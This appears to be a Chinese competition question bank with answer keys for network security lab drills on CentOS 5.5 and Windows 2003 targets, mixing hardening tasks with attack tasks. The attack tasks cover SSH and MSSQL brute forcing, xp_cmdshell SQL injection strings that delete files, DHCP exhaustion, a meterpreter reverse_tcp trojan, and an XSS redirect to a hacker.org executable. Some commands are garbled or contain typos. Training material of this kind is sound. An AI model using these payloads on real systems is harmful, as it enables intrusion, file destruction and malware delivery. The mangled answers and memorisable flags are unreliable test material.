训测三-3.2在虚拟机2003与靶机2003之间建立sslvpn,须通过CA服务颁发证书;2003服务器域名为,并将2003服务器个人证书信息的“颁发给:
”内容作为flag值提交。
训测三-3.3在虚拟机2003与靶机2003之间建立sslvpn,再次打开Ethereal,监听InternetExplorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnetExplorer访问靶机2003场景的http流量,并将靶机2003服务器通过sslRecordLayer对internetExplorer请求响应的加密应用层数据长度Length值作为flag值提交。
301
训测四1-1通过渗透平台对CentOS5.5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机(密码为654321),并将漏洞的路径作为flag值提交。
auxiliary/scanner/ssh/ssh_login
训测四1-2对CentOS5.5服务器场景进行安全加固,阻止PC中渗透测试平台对服务器场景CentOS5.5进行远程超级管理员口令暴力破解,并将配置文件路径及配置文件加固的内容字符串作为Flag提交。
格式为:
F1&F2
/etc/ssh/sshd_config&PermitRootLoginno
训测四1-3再次通过渗透平台对CentOS5.5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机,并将现实结果的倒数第二行作为flag值提交:
[*]Scanned1of1hosts(100%complete)
训测四1-4在服务器场景CentOS5.5上通过Linux命令行添加用户userl,并配置密码。
将添加用户的命令字符串F1与配置密码的命令字符串F2作为Flag值提交;格式为:
F1&F2&F3……
adduseruserl&passworduserl
训测四1-5在服务器场景CentOS5.5上开启http服务,其配置文件的路径作为flag值提交:
/etc/httpd/conf/httpd.conf
训测四1-6通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统综合扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;
A
训测四1-9通过渗透平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为flag提交;
arping–t5
训测四1-10通过渗透平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第二个数字作为flag提交;
5
训测四2-1在靶机与虚拟机上做ipsecvpn,组阻止Sniffer监听渗透测试,虚拟机通过ping访问WebServ2003服务器,将第一个数据包回显结果作为flag提交;
NegotiatingIPSecurity.
训测四2-2打开靶机,使其与物理机上的window2003虚拟机建立ipsecvpn,用渗透平台wireshark对其进行监听,找到第二阶段的显示结果的的倒数第一行作为flag值提交。
Data(68bytes)
训测四2-3在虚拟机2003与靶机2003之间建立sslvpn,再次打开Ethereal,监听InternetExplorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnetExplorer访问靶机2003场景的http流量,并将靶机2003服务器通过sslRecordLayer对internetExplorer请求响应的加密应用层数据长度Length值作为flag值提交。
训测四2-4在服务器场景Windows2003上对sqlserver2000进行sp4补丁安装,重启,将增加的端口整行信息作为flag值提交。
TCP0.0.0.0:
14330.0.0.0:
0LISTENING
训测四2-5通过PC中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;
训测四2-6通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交。
Windows[w]
训测四2-7查找windows2003靶机里的完整的计算机名称作为flag值提交;hh-admin
训测四2-8查找windows2003靶机系统属性中‘系统:
’后的字符串作为flag值提交;
MicrosoftWindowsServer2003StandardEdition
训测四2-9查找windows2003靶机来宾访客用户的名称,将其作为flag值提交;Guest
训测四2-10查找windows2003靶机的默认共享名,并将查找命令F1与默认共享名F2作为flag值提交。
格式为:
F1-F2
netshare-C$
训测五1-1使用bt5对靶机进行渗透测试,通过暴力破解ssh密码登录系统,并将密码作为flag值提交;
981
训测五1-2在服务器场景CentOS5.5上通过Linux命令行开启HTTP服务,并将开启该服务命令字符串作为Flag值提交;
/etc/init.d/httpdstart
训测五1-4通过PC中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作显示结果“OSDetails:
”之后的字符串作为Flag提交;
Linux2.6.9
训测五1-5在服务器场景CentOS5.5上通过Linux命令行关闭ssh服务,再次打开bt5,行操作系统综合扫描渗透测试,将关闭该服务命令字符串以及第二个服务信息作为Flag值提交;格式为:
f1|f2
servicesshdstop|111/tcpopenrpcbind(rpcbindV2)2(rpc#100000)
训测五1-6在服务器场景CentOS5.5上通过Linux命令行添加用户Za,添加密码并且给予root权限,将命令字符串作为Flag值提交;格式为:
F1|F2|F3
useraddZa|passwdZa|usermod–grootZa
训测五1-9在服务器场景CentOS5.5上进入httpd配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。
将修改后的一行代码作为flag值提交:
ServerTokensProd
训测五1-10在服务器场景CentOS5.5上进入httpd配置文件修改代码使其不回显apache版本信息。
将修改后的代码作为flag值提交:
ServerSignatureOff
训测五-1-11在服务器场景CentOS5.5上通过/…/ifconfig去查询ip地址,把…的值作为flag提交。
sbin
训测五-1-12用渗透平台对服务器场景CentOS5.5进行ssh远程登录并且使用wireshark对其进行协议分析,并把发送的第一个包的长度及encryption加密算法作为flag值提交;格式为f1-f2
48-aes128-ctr
训测五-1-13通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:
字符串1/字符串2/字符串3..)提交;
auxiliary/scanner/discovery/arp_sweep
训测五-1-14通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;
appears
训测五-1-15通过通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的倒数第二个单词作为Flag提交;
execution
训测五-1-16通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;
exploit
训测五2-1在服务器场景Windows2003上对sqlserver2000进行sp4补丁安装,重启。
将其补丁的文件夹名字F1和增加的端口号信息(用netstat-an查询)F2作为flag值提交:
格式为:
F1|F2
SQL2KSP4|TCP0.0.0.0:
14330.0.0.0:
0LISTENING
训测五2-2在bt5上使用hydra暴力破解sql-server数据库(mssql),并将其爆破结果中正确结果login:
结果和password:
结果作为flag值提交;格式为f1&f2
sa&1234
训测五2-3在靶机2003上打开sql-server,进行存储过程,在c盘下创建文件夹njcx,将其过程作为flag值提交。
execmaster.dbo.xp_cmdshell‘mdc:
\njcx’
训测五-2-4在虚拟机2003与靶机2003之间建立sslvpn,再次打开Ethereal,监听InternetExplorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnetExplorer访问靶机2003场景的http流量,并将靶机2003服务器通过sslRecordLayer对internetExplorer请求响应的加密应用层数据长度Length值作为flag值提交。
299
信息安全管理与评估补充题
1.配置靶机WebServ2003的DHCP功能,能够分配IP的范围为172.19.X.X(111~150),XP客户端申请IP地址,将第二阶段和第四的数据包类型作为Flag值提交,格式为:
F1-F2;
DHCPOFFER
DHCPACK
2.使用渗透机攻击WebServ2003,进行DHCP地址池耗尽攻击,把使用中的IP地址数比例作为Flag提交;
100%
3.进入loginAuth.php程序,修改PHP源程序,使之可以抵御SQL注入,并填补空缺处内容,将填补内容作为Flag提交,格式为F1|F2|F3;
Mssql_select_db
Password
$password
4.再次对该任务loginAuth.php页面注入点进行渗透测试,验证此次利用任意用户进行SQL注入渗透测试无效,并将回显提示信息作为Flag提交。
UsernameDoesNotExist
5.Web继续访问WebServ2003服务器,"/"->"EmployeeInformationQuery",分析该页面源程序,找到提交的变量名,并作为Flag提交。
usernm
5.Web继续访问WebServ2003服务器,"/"->"EmployeeInformationQuery",分析该页面源程序,将表单提交方式作为Flag提交。
get
6.Web继续访问WebServ2003服务器,"/"->"EmployeeInformationQuery",分析该页面源程序,表单提交后跳转页面的路径作为Flag提交。
list.html
7.对"EmployeeInformationQuery"页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将显示结果倒数第三行内容作为Flag提交;
Email:
ww@
9.通过对该任务题目5页面注入点进行SQL注入渗透测试,删除WebServ2003服务器的C:
\目录下的1.txt文档,并将注入代码作为Flag提交。
‘execmaster.dbo.xp_cmdshell‘delc:
\1.txt’—
10.进入WebServ2003服务器的C:
\AppServ\www目录,找到QueryCtrl.php程序,分析并修改PHP源程序,将‘%’替换为‘\%’,‘_’替换为‘\_’使之可以抵御SQL注入渗透测试,并将修改后新增语句内容作为Flag提交。
格式为F1-F2-F3…
$keyWord=addslashes($KeyWord);
$keyWord=str_replace(“%”,”\”,$KeyWord);
$keyWord=str_replace(“%_”,”\_”,$KeyWord);
11.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。
将系统出现的错误提示作为Flag提交。
BadKeyWord!
12.进入WebServ2003服务器,禁用系统存储过程可以抵御SQL注入渗透测试,将禁用系统存储的语句作为Flag提交。
格式为Y1-Y2-Y3-Y4...
13.进入"/"->"EmployeeMessageBoard"->"DisplayMessage"页面,再次对页面注入点进行渗透测试,调用存储过程删除WebServ2003服务器的C:
\目录下的1.txt文档,将页面提示第一个字符串作为Flag提交;
Warning
14.进入"/"->"EmployeeMessageBoard"->"DisplayMessage"页面进行XSS渗透测试,循环弹框"Hacker!
",根据该页面的显示,确定是注入点,并将构造的注入代码作为Flag提交。
15.通过IIS搭建网站(http:
//hacker.org/),并通过渗透机生成木马程序TrojanHorse.exe,将使用的工具和模块路径作为Flag提交。
格式为{F1&F2}
msfpayload
Windows/meterpreter/reverse_tcp
16.对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站(http:
//hacker.org/)中的木马程序:
http:
//hacker.org/TrojanHorse.exe,并将注入代码作为Flag提交。
Location.href=“htt:
//hacker.org/TrojanHorse.exe”;
17.进入WebServ2003服务器的C:
\AppServ\www目录,找到insert.php程序,分析并修改PHP源程序,使用‘{’替‘<’、‘}’替换‘>’,使之可以抵御XSS渗透测试,并将需要使用的函数和增加语句作为Flag提交。
格式为[F1/F2]
Str_replace
$info=str_replace(“<”,”{”,$info);
copyright@ 2008-2023 冰点文库 网站版权所有
经营许可证编号:鄂ICP备19020893号-2